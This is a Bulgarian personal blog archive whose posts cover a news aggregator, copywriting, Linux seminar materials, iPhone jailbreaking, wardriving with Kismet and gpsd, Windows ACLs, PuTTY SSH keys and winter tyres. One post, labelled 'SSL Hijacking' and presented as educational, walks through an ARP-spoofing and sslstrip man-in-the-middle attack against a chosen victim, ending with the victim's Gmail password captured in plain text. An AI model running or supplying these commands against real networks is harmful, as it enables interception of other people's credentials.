Архив

Статии по ключова дума: ‘D0’

Нов проект "Ново 10" -- Новини на български ( www.novo10.com )

30 август, 2010 Няма коментари

Днес стартирахме нов проект “Ново 10” ( www.novo10.com ) които обединява всички новини на български.
В този проект сме разделили публикациите на няколко категории:

  • България – Всичко което се случва в нашата родна страна
  • Свят- Случилото се в световен мащаб
  • Спорт – Спортните новини в България и Светът
  • Бизнес – Бизнес новини за всеки
  • Регионални – Всички случващи се събития за всеки град
  • Технологии – Технологични новини за техничарите
  • Любопитно – Любопитни новинки за любопитните
  • Блогосфера – Последните публикации от българските блогове

Два въпроса които ми зададе един приятел и реших да споделя на всички:

1. Защо да ползвам novo10.com ?
С отварянето на novo10.com може да се прегледат всички новини и когато някои ви заинтересува тогава да се влезе в сайта източник за да се прочете пълната новина. По този начин пестите време като не се налага да влизате във 10 сайта на ден както правят повечето хора, а само в един -- www.novo10.com .

2. Какво печелят сайтовете които предоставят RSS емисия(по този начин се визуализират новините на novo10.com ) ?
Печелят таргетиран трафик от ново10.ком, линк билдинг към техните авторски публикации както и брандиране.

Малко новинки от кухнята:

  • Стараем се да промотираме новините със снимки за целта на първите места излизат тези със снимка. Скоро ще ускорим още бързодействието на сайта понеже все още е в доста тестов период.
  • Новините се обновяват на всеки 30 минути.
  • Решихме леко да го промотираме за да изчистим по- бързо някои непредвидени грешки.
  • Ще добавим няколко секции освен новините които са до момента, но секциите ще оставим в тайна на този етап.
  • Добавили сме RSS емисия на последните новини които са публикувани във novo10.com . Ако желаете да я ползвате- http://www.novo10.com/feed/posledni_novini.xml

PS: Всички новини които са на български се предоставят чрез RSS като на всяка новина има връзка към авторската публикация.

новини на български

Пет стъпки при работа с копирайтър

23 юни, 2010 1 коментар

Не искате просто пренаписване на информация, публикувана вече някъде из мрежата, а наистина уникално съдържание? Добре е да работите с копирайтър, който има система за извличане на информация от клиента и може, въз основа на дадените му факти,  да напише текст, който ще носи духа и стила на съответната фирма.

Ето как приблизително би могъл да протича процесът на работа с копирайтър.

1.    Дайте възможност на копирайтъра да се запознае с бизнеса на клиента ви и със спецификите на бранша, в който той работи.
2.    Искайте въпросник, създаден специално за този клиент и с оглед на информацията, която ще ви бъде необходима за сайта.
3.    Много е важно клиентът ви да му отдели достатъчно внимание, колкото и лесни да изглеждат въпросите и да помисли върху тях. От неговите отговори зависи какво ще бъде написано на сайта по-късно.
4.    Може би ще има въпроси, които смущават клиента. Например: ”Кои са слабите страни на фирмата ви?” Важно е да се знае, че отговорите няма да се появят на сайта. Те служат на копирайтъра, за да създаде максимално оригинален текст, който може да бъде отнесен само към тази фирма и към никоя друга. Затова му е нужно да знае повече, отколкото ще каже.
5.    След като получи отговора на въпросите, не искайте от копирайтъра текстът да е готов след час или на следващия ден. Разбира се всичко зависи от обема и сложността на текстовете, но е необходимо да има време за анализ на отговорите, подготовка, писане и проверка.

Ако текстописецът е по-добре информиран по темата, по която пише, вероятността да даде наистина полезна и уникална информация на потребителите и те да се върнат отново на сайта и при същата фирма е много по-голяма.
Вярно е, че дизайнът и функционалността на един сайт са от огромно значение. Но не подценявайте текста. Защото все още конкретната полезна информация, идва от него.

За статията едно рамо даде: http://mogilska.com

Публикации за GNU/Linux от семинара преди години

26 май, 2010 Няма коментари

Преди 4-5 години с приятели направихме в гр. Добрич GNU/Linux семинар на тема "GNU/Linux? Да той е чудесен за работна станция" и щяхме да публикуваме подготвените материали от нас за семинара, но така и не го направихме. Днес в един форум (уебмастербг) видях един пич които беше заинтересуван и това реално ме проворика да ги издиря и публикувам за да са полезни на него и всички които търсят информация(Надявам се да бъдат полезни. Макар и малко старички някои неща от тях не остаряват като рибите).

Реших да ги публикувам в kakvo.org за да бъдат прочетени от повече хора и надявам се повече хора да мигрират към свободата. Ето ги и материалите:

GNU/Linux -- автор Мартин Петров
GNU/Linux Дистрибуции -- автор Мартин Петров
Умения за инсталиране на Gnu/Linux -- автор Мартин Петров
Основните команди за работа с Гну/Линукс -- автор Мартин Петров
KDE- автор Милен Неделчев
Графични среди под GNU/Linux - автор Георги Георгиев
Примерна инсталация на Fedora Core 4- автор Андон Николов
GNU Движение за Отворен код/ Въведение в свободният софтуер. - автор Георги Георгиев
Положителни и отрицателни черти на Gnu/Linux - автор Мартин Петров
Историята на GNOME - автор Георги Георгиев

Снимки от семинара(реших и тях да публикувам): Снимки от семинара

PS: Ако съм объркал някои като автор Андо, Гоше, Миленски кажете ще го фиксна веднага!.

По- близки впечатления от Iphone

15 март, 2010 8 коментари

Днес се сдобих с Iphone и в публикацията мисля да споделя няколко мои идеи, съвети и наблюдения които имам за Iphone. Моят модел е Iphone 3G 8G. Този телефон си избрах като модел понеже са ми необходими само следните приложения: ssh клиент, Browser (Safari), GPS Navigator (Igo My Way 2009).
Моят Iphone е със Version: 3.1.3(7E18), Modem Firmware или Baseband: 05.12.01 .Това го пиша понеже бих искал да си jailbrake телефона. Все пак искам пълен контрол или почти пълен контрол върху телефона СИ.  Преди да започна може би ще възникне въпроса как ще си ънлокна телефона ? Няма да го отключвам защото си взех Iphone neverlock които не изисква отключване. Разликата между Iphone neverlock и Iphone unlocked е следната:

Iphone neverlock -  Никога не е бил заключван
Iphone unlocked -  Бил е отключен
По този начин когато е neverlock няма да се притеснявам при следващи упдейти на baseband-а или фърмуера на модема.

Сега ще пробвам да го jailbrake. След като изчетох куп неща успях да го jailbrake (Полезна информация има в един Български форум за Iphone- http://iphone-bulgaria.com/) След като вече е jailbrake усещам малко по- голяма свобода и контрол в/у телефона.

Сега ще си направя акаунт в iTunes Store и ще си закупя няколко приложения :)
Приложенията които имам и използвам на телефона си:

Jaadu VNC -- VNC клиент с които мога да се свързвам към Windows/Linux/MAC машини със VNC сървър
iSSH -- SSH клиент с които мога да се вързвам към ssh сървъри
Safari -- Страхотен интернет браузър
Terminal -- Локален терминал към телефона
I go My Way 2009 -- GPS навигатор развит от унгарци страхотен за Европа
Cydia -- Приложението идва със jailbrake (подобно е на apt при дебиан така да се каже)
QuickOffice -- Офис с които могат да се отварят Word, Excell, PDF, Photo файлове
BrainChallenge -- Доста забавна игричка за развиване на логиката
MS PAC-MAN -- Отново забавна игричка или т.н. PAC MAN :)
Starmap -- Това приложение страхотно. Показва всички съзвездия
Skype - Без Скайп не може :)
WeDict -- Речник от Български <-> Английски

Инсталирането на всичките приложения става много лесно от iTunes Store :) . Просто всичко е устроено доста логично и лесно.

Други интересни наблюдения за Iphone са, че ако телефона е заключен(заключва се когато се натисне веднъж бутона  горе) и някои ви звънне освен, че имате възможност да му вдигнете, чрез "Slide to answer" и да му затворите като натиснете два пъти бутона за заключване "бутона горе".

Тествах и гледането на филми и слушането на музика- Страхотно е. Това е може би една неизменна част от всяко едно пътуване (без да шофирам разбира се). Трябва да се знае, че музиката може да е в MP3 формат, но филмите трябва да се конвертират от познатите ни DivX филми към Iphone формат (mp4). Все пак да не забравяне, че Iphone си е Ipod .

Друго любопитно нещо е GPRS/Edge интернет които имам активиран в моята карта. Един вид ако нямам Wireless интернет а искам да ползвам приложения изискващи интернет като Safari автоматично ми се включва GPRS и страницата ми се отваря :) . Страхотно, но и тарифите за GPRS в България са доста неизгодни за повечето хора затова го казвам. Ако някои прецени, че не иска GPRS/Edge интернет може да го деактивира като отиде в офиса на съответния оператор или да се обади на безплатния телефон за целта. Ако след това желаете да активирате своя GPRS/Edge е необходимо отново да се обадите на оператор или да отидете да офиса на оператора си и да им кажете, че искате GPRS/Edge и ще бъде активен до 2 часа.

Още нещо интересно са протекторите. Ако искате да го смените струва около 5-20 лв. Когато изтъркате своя протектор може да си го смените и телефонът ви да изглежда напълно нов :) Препоръчително е да оставите тази задача на някои магазин за телефони понеже се предполага, че имат повече опит с поставянето на протектори или на собствена отговорност да си го поставите.

А знаете ли, че от долната страна на Iphone има две мембранки като лявата е говорителя, а дясната микрофона. Това го казвам понеже се шашнах защо десния ми говорител не работи, а то било микрофон :) Казвам го за хората които също може да се притеснят.

Междо другото някои си дупчат умишлено лявата мембрана за да повишат силата на звука на телефона (повишавало се със 20-75%), но аз лично не го препоръчвам. Ето и линкче, към трика за увеличението на звука: http://www.iphoneincanada.ca/tips-tricks/170/

Саундът на телефона е страхотен, а със слушалки(нормални слушалки) е унищожителен :) . Хубавото е, че може да се ползват нормални компютърни слушалки, а не някакви специални за телефони :)

За момента Iphone си заслужава цената, дори и отгоре. Надявам се не съм го прехвалил и дано излезе сполучлив.

Какво е Wardriving и как да го направим (Kismet + Festival + Gpsd + Gpsdrive)

4 февруари, 2010 1 коментар

При Wardriving идеята е да се засекат wireless мрежи и да бъдат картографирани. Според нашият закон или това което четох това не е нелегално(освен ако не се използват тези мрежи с лоши намерения). Все пак аз съм го направил с цел познание и идеята на тази публикация е да споделя знание.

Преди да започнем ще опиша какво ще ни трябва:
Устройства(Gps Reciever с bluetooth, bluetooth на самия лаптоп),
Приложения (gpsdrive,gpsd,bluez-utils,festival,mysql-server,kismet)

След като имаме устройствата ще инсталираме приложенията. Аз лично ползвам Holux 240 slim, но е доста бъгав. От време на време сам решава да се бъгне и да не показа кординатите, а двойчни глупости. За да го върнем в NMEA режим трябва да му извадим батерията с което се връща на първоначални настройки(голямо решение няма що. Има и друго ползвайте друг gps reciever).

Инсталиране на приложенията:
apt-get install gpsdrive gpsd festival mysql-server-5.0 kismet bluez-utils

Сега влючваме нашият GPS Reciever
Изпълняваме "hcitool scan" и виждаме:

Scanning …
00:0B:0D:6D:A1:E8   HOLUX GPSlim240

Ето го и търсеният от нас MAC адрес на Holux Slim 240

Редактираме конф. файлове от bluez-utils в /etc/bluetooth

/etc/bluetooth/hcid.conf

Променяме нашият пин ето тук(в случая е 0000):
passkey "0000"

Сега редактираме /etc/bluetooth/rfcomm.conf

rfcomm0 {
bind no;  # Automatically bind the device at startup
device 00:0B:0D:6D:A1:E8; # Bluetooth address of the device
channel 1; # RFCOMM channel for the connection
comment "My GPS device 00:0B:0D:6D:A1:E8"; # Description of the connection
}

Става ясно, че описваме mac адреса на нашият gps reciever

След това вдигаме нашият интерфейс:
hciconfig hci0 up

Свързваме се към нашето устройство Holux:
hcitool cc 00:0B:0D:6D:A1:E8

Отваряме канал
sdptool add --channel=1 OPUSH

и след това биндваме rfcomm0
rfcomm bind rfcomm0 00:0B:0D:6D:A1:E8

За да проверим, че получаваме данните коректно(данните са в текстов вид NMEA) изпълняваме това:
cat /dev/rfcomm0

Ако се вижда нещо от рода:
$GPGGA,235955.065,0000.0000,N,00000.0000,E,0,00,,0.0,M,0.0,M,,0000*4D
$GPRMC,235955.065,V,0000.0000,N,00000.0000,E,,,150406,,,N*7E
$GPVTG,,T,,M,,N,,K,N*2C
$GPGGA,235956.059,0000.0000,N,00000.0000,E,0,00,,0.0,M,0.0,M,,0000*41
$GPRMC,235956.059,V,0000.0000,N,00000.0000,E,,,150406,,,N*72
$GPVTG,,T,,M,,N,,K,N*2C
$GPGGA,235957.059,0000.0000,N,00000.0000,E,0,00,,0.0,M,0.0,M,,0000*40
$GPGSA,A,1,,,,,,,,,,,,,,,*1E

То нашият GPS Reciever още не си е намерил сателитите и трябва да го изчакате известно време(на открито). След като си ги намери тези нули се превръщат в кординати разбира се.

Сега ще стартираме и gpsd които да обработва данните от rfcomm0

gpsd /dev/rfcomm0

Можем да проверим дали правилно приема данните със следната команда:

gpspipe -r

След като пуснахме основните приложения сега ще пуснем и Kismet. Неговата задача е да следи wireless мрежите и да ги записва във файл с техните кординати.

За да стартираме kismet като сървър трябва да укажем source type, а ако не го направим ще ни излезе следната грешка:

FATAL: Please configure at least one packet source.  Kismet will not function if no packet sources are defined in kismet.conf or on the command line.  Please read the README for more information about configuring Kismet

Това е защото не е зададен capture source type. За целта редактираме /etc/kismet/kismet.conf , ред "source":

source=iwl3945,wlan0,wlan0

Важен е първия аргумент където указваме какъв модул се зарежда за wireless картата, а в този случай е iwl3945

Сега ще накараме Kismet да логва всички wireless мрежи които намери + техните координати. За целта трябва да редактираме /etc/kismet/kismet.conf

waypoints=true
# GPSDrive waypoint file.  This WILL be truncated.
waypointdata=~/.gpsdrive/way.txt

Следващата стъпка е да накараме Kismet освен да логва и да говори.
Сега ще направим един малък тест на festival

echo "Hi from mpetrov.net -- Festival test"|festival --tts

Ако ви изплюе следната грешка "Linux: can't open /dev/dsp" то тогава извършете това по- долу:

Решение на проблема по- горе:

Редактира се файл (.festivalrc) или (/usr/share/festival/festival.scm):
vim ~/.festivalrc
и се добавя това:
(Parameter.set 'Audio_Method 'Audio_Command)
(Parameter.set 'Audio_Command "aplay -q -c 1 -t raw -f s16 -r $SR $FILE")

Сега след като имаме инсталиран и работещ festival ще направим промени в конфигурационния файл на kismet.
kismet.conf(за сървъра)

#Променя се от false на true
Speech=true
#Променя се от nato на speech
speech_type=speech

Ако не искаме да говори kismet сървъра, а нашият kismet клиент правим същите промени, но за "kismet_ui.conf"

Сега ще стартираме и gpsdrive. Неговата цел е да взима данните от Kismet ~/.gpsdrive/way.txt , да ги записва в MySQL базата(която ще създадем след малко) и да визуализира текущото ни местоположение на картата.

Първо трябва да създадем нашата база с таблиците които ще ползва gpsdrive изпълняваме:
geoinfo --create-db geoinfo --db-name geoinfo --db-user gast --db-password gast

Стартираме gpsdrive и какво ? Данните се записват и всичко е страхотно :)

Но на мен лично тази карта не ми допада особено и искам всичко това да го преместя в/у картата на GoogleEarth. За целта използвах едно готово python скриптче, което не работеше (нямаше и автор) и трябваше да пренапиша. Може да бъде изтеглено от тук: gpsdriveToGoogleEarth_mpetrov_net.py

изпълняваме python скриптчето което трябва да конвертира от gpsdrive към GoogleEarth:

python gpsdriveToGoogleEarth_mpetrov_net.py

Получавам следната грешка"
#:/tmp# python gpsdriveToGoogleEarth_mpetrov_net.py
Traceback (most recent call last):
File "gpsdriveToGoogleEarth_mpetrov_net.py", line 1, in <module>
import MySQLdb
ImportError: No module named MySQLdb

Това е защото очевидно нямам mysql модул за python. Сега ще го инсталирам:

apt-get install python-mysqldb

Сега като го изпълним и ще се генерира файл wireless_mpetrov_net.kml които ще вкараме в Google Earth, чрез импорт. Виждаме мрежите които сме картографирали по- рано.

В интерес на истината написах едно простичко bash скриптче което прави някои неща автоматизирано. То може да бъде изтеглено от тук:  War Driver 1.0

Потенциален проблем които може да възникне при употребата на Kismet
Проблем при стартиране на Kismet:

ERROR:  Unable to find room for logging files within 100 counts.  If you really are
logging this many times in 1 day, change log title or edit the source.
WARNING: Error disabling monitor mode: Failed to set channel 0 22:Invalid argument
WARNING: wlan0 (wlan0) left in an unknown state.  You may need to manually
restart or reconfigure it for normal operation.
WARNING: Sometimes cards don't always come out of monitor mode
cleanly.  If your card is not fully working, you may need to
restart or reconfigure it for normal operation.
Trying to wake networkmanager back up…
Kismet exiting.

Решението е :
rm -fr /var/log/kismet/*

Идеята на тази публикация е с учебна цел. Аз като автор не нося никаква отговорност за причинени от нея щети.

PS: Моля слагайте си WPA2 пароли с максимална дължина и сложност поне като минимално нещо което трябва да направите за свойте wireless мрежи.

Промяна на ограниченията в Windows XP и Windows server 2003

1 февруари, 2010 Няма коментари

Един приятел скоро инсталирал XP на една машина и като администратор изтеглил куп неща в дял D: . След това направил потребителски имена на всички потребителите които ще ползват системата. Супер, но когато потребителя се логне в системата няма достъп до файловете в дял D:(тези които преди това моят приятел(като администратор) е добавил по- рано). За да предоставим достъп на потребителите в системата трябва да променим ограниченията на тези файлове чрез cacls:

D:\>cacls /?
Displays or modifies access control lists (ACLs) of files

CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]]
[/P user:perm [...]] [/D user [...]]
filename      Displays ACLs.
/T            Changes ACLs of specified files in
the current directory and all subdirectories.
/E            Edit ACL instead of replacing it.
/C            Continue on access denied errors.
/G user:perm  Grant specified user access rights.
Perm can be: R  Read
W  Write
C  Change (write)
F  Full control
/R user       Revoke specified user's access rights (only valid with /E).
/P user:perm  Replace specified user's access rights.
Perm can be: N  None
R  Read
W  Write
C  Change (write)
F  Full control
/D user       Deny specified user access.
Wildcards can be used to specify more that one file in a command.
You can specify more than one user in a command.

Abbreviations:
CI -- Container Inherit.
The ACE will be inherited by directories.
OI -- Object Inherit.
The ACE will be inherited by files.
IO -- Inherit Only.
The ACE does not apply to the current file/directory.

В този пример ще дадем пълни права на потребител "dr_nikolov":

cacls d:/*.* /T /E /P dr_nikolov:f

Сега ще "разтълкувам" предната команда:

1. calcs -  Името на приложението което използваме за промяна на ограниченята
2. "d:/*.*" - Това са всички директории и файлове които се намират във дял D:
3. /T - Рекурсивно променя ограниченията на всички файлове и директории, вкл. и техните под директории
4. /E - Редактиране на ограниченията
5. /P dr_nikolov:f -- Тук даваме "Full Control" или пълен достъп до файловете на потребител "dr_nikolov"

Това е всичко :)

Автоматично SSH логване с PuTTY

22 януари, 2010 Няма коментари

Здравейте казвам се Мартин Петров и съм създал тази демонстрация единствено и само с учебна цел.

В тази видео демонстрация ще обясня как да генерирате и използвате частните и публични двойки ключоче за да се логвате през SSH с PuTTY. PuTTY е SSH клиент които работи на Windows и Linux, но най- често е употребяван за Windows. Идеята на ключово базираните SSH логини е да не се налага да въвеждате всеки път потребителско име и парола, а автоматично да влизате в отдалечената система в която имате достъп .

Хайде да започнем демонстрацията.

1. Преди всичко трябва да имаме SSH достъп до отдалечена GNU/Linux машина в случая при нас това е машина с IP адрес 10.10.10.1, а ние имаме достъп

2. След това трябва да изтеглим необходимите приложения за Windows, които в случая съм изтеглил

2.1 PuTTY (http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe)
2.2 PuTTY Gen (http://the.earth.li/~sgtatham/putty/latest/x86/puttygen.exe)
2.3 PageAgent (http://the.earth.li/~sgtatham/putty/latest/x86/pageant.exe)

След като вече ги имаме сега ще генерираме публичен и частен ключ за съответния логин в машина 10.10.10.1 като използваме приложението puttygen
Стартираме го и поглеждаме в менюто "Keys" за да сме сигурни, че са избрани SSH-2 RSA key

След това натискаме "Generate" за да  генерираме нашият ключ и въвеждаме наша парола на ключовете. За да го генерираме се изисква да местим по- бързо мишката понеже движението се използва за генерирането на ключа.

След като публичния ключ е генериран ще го копираме на отдалечената машина 10.10.10.1.
Трябва да копираме текста от секция "Public key for pasting into OpenSSH authorized_keys file:" и да се логнем в машината. Сега трябва да създадем директория(ако не съществува) .ssh и да поставим предварително копирания текст във файл authorized_keys

След това генерираме личен ключ от PuTTY Key Generator като натиснем бутона "Save Private key" и за тваряме приложението.

Сега отваряме приложението pageant (Search PuTTY SSH authentication Agent) и зареждаме нашият личен ключ като идеята на това приложение е да не се налага запомнянето на ключовите фрази.

След като подготвихме всичко това сега остава да си направим един PuTTY профил.
В Host Name (or IP Address) въвеждеме адреса на машината в която имаме достъп 10.10.10.1, а на порт оставяме подразбиращият се 22. Избираме си и име на сесията или профила "Saved Sessions" autop

В секция "Connection" -> "Data", поле "Auto-login username" трябва да въведем нашето потребителско име, което  в случае е: autop .
Сега трябва да заредим нашият личен ключ в секция "SSH"->"Auth" в "Private key file for authentication"

След всичко това остава да запазим настройките на своя профил като натискаме бутона "Save"

Тук виждаме, че можем да се логваме в машината 10.10.10.1 без да се изисква въвеждането на потребителско име и парола.

Може да гледате видео демонстрацията от Youtube: Автоматично SSH логване с PuTTY
Демонстрация във vbox7: Автоматично SSH логване с PuTTY

Логване в SSH сървър, чрез PuTTY

22 януари, 2010 Няма коментари

Здравейте отново от мен Мартин Петров. Тази видео демонстрация е създадена единствено и само с учебна цел.

Този тази видео демонстрация е част от публикацията "За какво да ползваме PuTTY"  в блога www.mpetrov.net

PuTTY е SSH клиент които се ползва най- много от Windows потребителите. Това видео всъщност е именно за тях. Сега ще демонстрирам как чрез PuTTY може да се логнете в отдалечена машина с пуснат SSH сървър в нашият случай GNU/Linux Debian с пуснат OpenSSH сървър.

Преди всичко трябва да изтеглим PuTTY. Просто пишем в google "PuTTY" и първият резултат ни дава линк от където да го изтег7лим. Аз съм го изтеглил предварително и за целта продължаваме напред към демонстрацията.

Стартираме Putty и в секция "Host name" въвеждаме хостнейм или IP адрес на машината в която искаме да се логнем. В нашият случай е IP адрес 10.10.10.1 . Портът които е сетнат в машината е 22( двадесет и втори) затова оставям този порт. В секция "Saved Sections" записваме името на профила и след това натискаме "Save". Така следващият път вместо да правим тези настройки просто два пъти ще натистнем с мишката върху този името на профила които преди малко написахме.

Може да гледате видео демонстрацията от Youtube: Логване в SSH сървър, чрез PuTTY
Демонстрация във vbox7: Логване в SSH сървър, чрез PuTTY

SSL Hijacking- Видео демонстрация

6 януари, 2010 2 коментари

Здравейте отново от мен Мартин Петров и както винаги тази видео демонстрация е създадена с учебна цел. Авторът не носи отговорност за потенциални щети нанесени от демонстрацията.

Сега ще ви демонстрирам как можете да подслушвате SSL връзки или SSL Hijachking чрез sslstrip от Moxie Marlinspike.

Преди всичко трябва да сканираме своята мрежа и да си изберем потребител на които ще подслушваме SSL връзката.
Отваряме терминал едно и сканираме нашата мрежа

Избираме потребител с IP адрес 192.168.1.100

Сега ще се подготвим за нашият SSL Hijacking като отварим терминал 1 и  редактираме /etc/etter.conf

Позволяваме форвардинг
echo 1 > /proc/sys/net/ipv4/ip_forward

Сега пренасочваме порт 80 към 10 000 с iptables

iptables -t nat -A PREROUTNIG -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Сега изпълняваме arp спуфинг

arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

В терминал две стартираме sslstrip с аргумент -a -k -f

sslstrip -a -k -f

И в терминал 3 стартираме ettercap за да видим резултата от всичко това :)

ettercap -T -q -i eth0

Хайде сега да наблюдаваме машината на потребителя

Сега потребителят ще отвори сайт с криптирана връзка HTTPS. Например gmail: https://mail.google.com

Въвежда примерно потребителско име и парола

Ще погледнем ettercap в нашата машина. Виждаме потребителското име и паролата които потребителя  въведе по- рано. Всичко се вижда в чист текст като се има впредвид, че връзката беше реализирана чрез https.

По същия начин могат да се прослушват и нормални връзки към страници работещи на 80-ти порт.

Сега потребителя ще отвори уеб сайта arenabg.com и ще въведе примерно потребителско име и парола
Отново виждаме потребителското име и парола.

Видео демонстрация SSL Hijacking:

1. Видео демонстрация качена във vbox
2. Видео демонстрация качена във youtube

Защо да ползваме летни гуми за лятото и зимни за зимата

5 ноември, 2009 Няма коментари

Над този въпрос размишлявахме с един приятел и реших да потърся за повече детайлна информация.  Ето какво открих:

Защо слагаме зимни гуми?

За сигурно шофиране през зимата е необходимо оптимално сцепление. Благодарение на специалния си дизайн с множество ламели, зимните гуми имат много по-голяма контактна площ с пътя, което гарантира по-добра устойчивост и по-къс спирачен път.

При движение на сняг със скорост от 50 км/ч автомобил, "обут" с четири зимни гуми, има спирачен път от 35 метра, докато този с летни гуми спира за 43 метра.
При заледен път и скорост от само 30 км/ч разликата е още по-голяма. Зимните гуми спират за 57 метра, а летните за цели 68 метра.

Много често метрите, спечелени от зимните гуми, предотвратяват сериозни произшествия и спасяват човешки животи. Кои са истинските зимни гуми? На пазара се предлагат т. нар. "всесезонни" гуми. Според производителите им са подходящи за употреба през цялата година -- при пролетния дъжд, при лятната жега, при есената слана и зимния лед. Това не е нищо друго освен маркетингов трик, който обаче често струва скъпо на клиента. И докато през лятото свойствата на тези гуми са задоволителни, при зимни условия употребата им е компромис със сигурността.

zimen_znakПрез 1999 г. в САЩ и Канада бе приет нов стандарт за зимни гуми, който вече е световно признат. Зимните гуми, одобрени по строгите изисквания на този стандарт, гарантират на клиентите най-високите възможни нива на устойчивост и сцепление с пътя при сурови зимни условия и са маркирани със специален знак: снежинка на фона на планина.

Защо силика?

Най-новата технология в производството на зимни гуми е използването в каучуковата смес на силициев двуокис SiO2, химическо съединение известно под името силика. При температури под 7 градуса Целзий, обикновената каучукова смес на летните и всесезонни гуми губи еластичността си и не може да осъществи добро сцепление с пътя дори при сухи условия. Чрез прибавянето на силика се запазва еластичността на каучуковата смес при минусови температури и се постига маскимално сцепление при сняг и лед. Така например, новите зимни гуми със силика Lassa Snoways Era, производство на Bridgestone Sabanci имат 15% по-добро сцепление на сняг в сравнение с предходния модел на фирмата, което води и до значително подобрение на спирачния път при зимни условия. …

За да прочетете цялата статия, моля натиснете тук: автогуми.ком